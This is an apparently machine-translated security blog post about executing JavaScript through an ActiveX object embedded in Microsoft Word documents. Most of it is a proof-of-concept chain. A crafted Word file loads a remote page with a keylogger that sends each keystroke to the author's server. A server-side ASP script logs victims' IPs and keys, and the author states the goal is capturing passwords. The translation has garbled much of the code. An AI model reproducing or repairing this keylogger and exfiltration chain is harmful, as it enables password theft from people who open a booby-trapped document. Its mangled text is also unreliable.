Some tests on MS word javascript execution

Author: cosine
Source: 0 × 37 Security

Microsoft word javascript execution Original: http://marc.info /? L = bugtraq & m = 121121432823704 & w = 2, discussed in the hi group. We can draw some conclusions:

1. Because the ActiveX inline data stream function is disabled after the Q313675 security patch is installed, it is not feasible to execute malicious codz by directly creating ActiveX objects using JS. The following code:

<Html>
<OBJECT classid = clsid: AE24FDAE-03C6-11D1-8B76-0080C744F389> <param name = url value = "javascript: document. write (& lt; script src = http://www.0x37.com/doc.js&gt;&lt;/script&gt;)"> </OBJECT>
This remote doc. js file has limited capabilities. However, the pop-up dialog box or a new window still works.

2. holes are actually found in xml files. When html constructed in the preceding way is opened in word and saved as xml, the data in the xml file is converted to xml format. However, the <w: ocx w: data = "......" />. This is where the problem occurs. The extension .doc,. rtf, And. xml will be opened in the word default mode. At this time, word acts as an interpreter, <w: ocx w: data = "......" /> The internal data is interpreted and executed, causing JS.

3. The AE24FDAE-03C6-11D1-8B76-0080C744F389 is the classid of mshtml. dll. It is still valuable to identify the cause of the vulnerability and fix the vulnerability.

Since this JS capability is limited, you can enjoy it, as mentioned here: http: // www.0 × 37. com/post/15.html. The following POC is carried out in this way: when the user opens the worddocument behind our malicious structure doc.doc, will pop up the internal network of the home page http://www.xiaonei.com (take it to experiment, completely out of my inertia ......). Then we can record the user's key records on this page :). Maybe the password is caught directly. (if other users are the same as me, you can Enter the password directly on the Intranet and then Enter. This is a habit ......).

The doc.html code is as follows:

<Html>
<OBJECT classid = clsid: AE24FDAE-03C6-11D1-8B76-0080C744F389> <param name = url value = "javascript: x = open (http://www.xiaonei.com/); setInterval (function () {try {x. frames [0]. location = {toString: function () {return % 20' http: // www.0 × 37. com/Project/poc/docshell.html ';}} catch (e) {}, 3000); void (1); "> </OBJECT>
HI
Follow http://marc.info /? Lw.bugtraq&m=123791432823704&w=2the generated doc.doc file (this is the evil document. Change the name so that you can open it easily ).

The remote docshell.html code is as follows:

<Html>
<Body bgcolor = "#333333" type = "codeph" text = "/codeph">
<Div id = "o"> </div>
<Input type = text id = "x" style = "width: 0; height: 0">
<Script>
Var _ x = false;
If (window. XMLHttpRequest ){
_ X = new XMLHttpRequest ();
} Else if (window. ActiveXObject ){
_ X = new ActiveXObject ("Msxml2.XMLHTTP ");
If (! _ X) {_ x = new ActiveXObject ("Microsoft. XMLHTTP ");}
}
Document. onkeydown = function (e ){
If (! E) e = window. event;
Try {
Tmp = (String. fromCharCode (e. which | e. keyCode ));
_ 3or7 ("GET", "asp? Tmp = "+ tmp, null"> http: // www.0 × 37. com/Project/poc/docshell. asp? Tmp = "+ tmp, null );
} Catch (ex ){}
}
Function _ 3or7 (_ m, _ s, _ ){
_ X. open (_ m, _ s, false );
_ X. send (_ );
Return _ x. responseText;
}
SetInterval (function () {try {document. getElementById ('x). focus () ;}catch (e) {}, 100 );
Focus ();
</Script>
</Body>
</Html>
The remote docshell. asp code is as follows:

<%
Ip = Request. ServerVariables ("HTTP_X_FORWARDED_FOR ")
If ip = "" Then
Ip = Request. ServerVariables ("REMOTE_ADDR ")
End If
Tmp = Request. QueryString ("tmp ")
Response. write (tmp)
Filename = "docshell.txt"
Set fso = Server. CreateObject ("Scripting. FileSystemObject ")
Set file = fso. OpenTextFile (server. mappath (filename), 8, true)
File. write (ip + ">" + tmp + chr (13 ))
File. close
Set file = nothing
Set fso = nothing
%>
Then we can see the record result on the http: // www.0 × 37. com/Project/poc/docshell.txt :). Complete file: http: // www.0 × 37. com/Project/poc/wordjs.rar. However, this keyboard record is still flawed. I wanted to combine the http: // www.0 × 37. com/post/15.html method to construct more evil code, but it was not smooth ...... Then I will talk about it later :). Now let's wait for more information about the vulnerability.